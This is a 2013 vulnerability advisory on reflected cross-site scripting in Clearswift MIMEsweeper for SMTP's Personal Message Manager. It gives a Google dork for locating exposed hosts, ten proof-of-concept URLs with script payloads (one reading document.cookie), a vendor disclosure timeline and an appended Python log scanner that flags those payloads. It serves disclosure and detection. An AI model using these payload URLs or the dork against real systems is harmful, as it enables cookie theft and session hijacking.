MIMEsweeper For SMTP 5.5 Cross Site Scripting

2013.02.19
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

Application: MIMEsweeper for SMTP 5.5 (5.2, 5.3, 5.4 and probably earlier versions) Personal Message Manager (PMM)
Vendor: Clearswift Ltd
Vendor URL: http://www.clearswift.com/
Category: Reflective XSS
Google dork: inurl:/MSWPMM/
Discovered by: Anastasios Monachos (secuid0) - [anastasiosm(at)gmail(dot)com]

[Vulnerability Reproduction]
1. https://[HOST]/MSWPMM/Common/Reminder.aspx?email=test<script>alert(document.cookie)</script>
2. http://[HOST]/MSWPMM/Common/NewAccount.aspx?email=<script>alert("xss")</script>
3. http://[HOST]/MSWPMM/Common/NewAccount.aspx?ddlCulture=<script>alert("xss")</script>
4. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCreateAccount=<script>alert("xss")</script>
5. http://[HOST]/MSWPMM/Common/NewAccount.aspx?btnCancel=<script>alert("xss")</script>
6. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbEmailAddress=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
7. http://[HOST]/MSWPMM/Common/SignIn.aspx?tbPassword=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
8. http://[HOST]/MSWPMM/Common/SignIn.aspx?cbAutoSignIn="<script>alert("xss")</script>
9. http://[HOST]/MSWPMM/Common/SignIn.aspx?btnSignIn=<script>alert("xss")</script>ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx
10. http://[HOST]/MSWPMM/Common/SignIn.aspx?reason=<script>alert("xss")</script>

[Time-line]
17/07/2009 - Initial discovery
13/01/2012 - Notified vendor
13/01/2012 - Vendor responded
16/01/2012 - Vendor requested more information
16/01/2012 - Vendor supplied demo version of latest release (v5.5) to evaluate
16/01/2012 - Informed vendor of evaluation progress, v5.5.0 is vulnerable too
17/01/2012 - Telephone conversation with vendor regarding the findings
17/01/2012 - Assigned vulnerability reference MSW-1459
25/01/2012 - Requested status update
25/01/2012 - Vendor replied "There is no update on MSW-1459."
16/02/2012 - Requested status update
26/02/2012 - Vendor replied "There is no update on MSW-1459."
23/03/2012 - Requested status update
23/03/2012 - Vendor replied "There is no update on MSW-1459."
09/05/2012 - Requested status update and gave notice of public disclosure
11/05/2012 - Vendor replied "There is no update on MSW-1459."
18/05/2012 - Vendor replied that the issue has been escalated to their Engineering Response Team
07/06/2012 - Vendor informed us that the issues will be addressed in the next scheduled release
07/06/2012 - Requested due date for next release
12/06/2012 - Vendor informed us that the next patch release is being targeted for Q4 2012
13/06/2012 - We suggested postponing the disclosure until after the patch is public
06/12/2012 - Requested status update
06/12/2012 - Vendor sent details for patch
28/01/2013 - Patch is applicable for 5.5.1
09/02/2012 - We requested a demo license to verify the fix
15/02/2013 - Vendor could not produce demo license for us to verify the fix
15/02/2013 - Vendor closes incident ticket
18/02/2013 - Public disclosure date
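
[Detection example]
The following is an added example, not part of the original advisory or of Clearswift's code: a log check that flags requests to the PMM pages named in the reproduction list when one of the listed parameters carries markup after percent-decoding. The combined access-log format, the sample log lines and the function names are assumptions made for illustration.

```python
import re
from urllib.parse import parse_qsl, urlsplit

# Pages and parameters taken from the advisory's reproduction list.
PMM_PARAMS = {
    "reminder.aspx": {"email"},
    "newaccount.aspx": {"email", "ddlculture", "btncreateaccount", "btncancel"},
    "signin.aspx": {"tbemailaddress", "tbpassword", "cbautosignin", "btnsignin", "reason"},
}
# Characters needed to open a tag or break out of an HTML attribute.
MARKUP = re.compile(r"[<>\"']")
# Request target inside a combined-format access log line (assumed log format).
REQUEST = re.compile(r'"(?:GET|POST|HEAD) (\S+) HTTP/[\d.]+"')

def suspicious_params(target):
    """Return [(page, param, value)] for watched PMM parameters carrying markup."""
    parts = urlsplit(target)
    path = parts.path.lower()
    if "/mswpmm/common/" not in path:
        return []
    page = path.rsplit("/", 1)[-1]
    watched = PMM_PARAMS.get(page, set())
    hits = []
    # parse_qsl percent-decodes values, so %3Cscript%3E is caught as well.
    for name, value in parse_qsl(parts.query, keep_blank_values=True):
        if name.lower() in watched and MARKUP.search(value):
            hits.append((page, name, value))
    return hits

def scan(lines):
    """Yield (line_number, page, param, value) for each flagged request."""
    for number, line in enumerate(lines, 1):
        match = REQUEST.search(line)
        if match:
            for page, name, value in suspicious_params(match.group(1)):
                yield number, page, name, value

# Constructed sample log lines (not from a real server).
SAMPLE_LOG = [
    '192.0.2.10 - - [19/Feb/2013:10:00:01 +0000] "GET /MSWPMM/Common/SignIn.aspx?ReturnUrl=%2fMSWPMM%2fCommon%2fdefault.aspx HTTP/1.1" 200 5120',
    '192.0.2.44 - - [19/Feb/2013:10:02:13 +0000] "GET /MSWPMM/Common/Reminder.aspx?email=test%3Cscript%3Ealert(document.cookie)%3C/script%3E HTTP/1.1" 200 4312',
    '192.0.2.44 - - [19/Feb/2013:10:02:40 +0000] "GET /MSWPMM/Common/SignIn.aspx?reason=%3Cscript%3Ealert(%22xss%22)%3C/script%3E HTTP/1.1" 200 5230',
    '192.0.2.77 - - [19/Feb/2013:10:05:00 +0000] "GET /MSWPMM/Common/NewAccount.aspx?email=user@example.com HTTP/1.1" 200 4100',
]

if __name__ == "__main__":
    for hit in scan(SAMPLE_LOG):
        print(hit)
```

Legitimate values for these fields (e-mail address, culture code, button names) should never contain angle brackets or quotes, so hits on a production PMM host are worth reviewing alongside the response body for an unencoded echo.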

References:

http://www.clearswift.com/

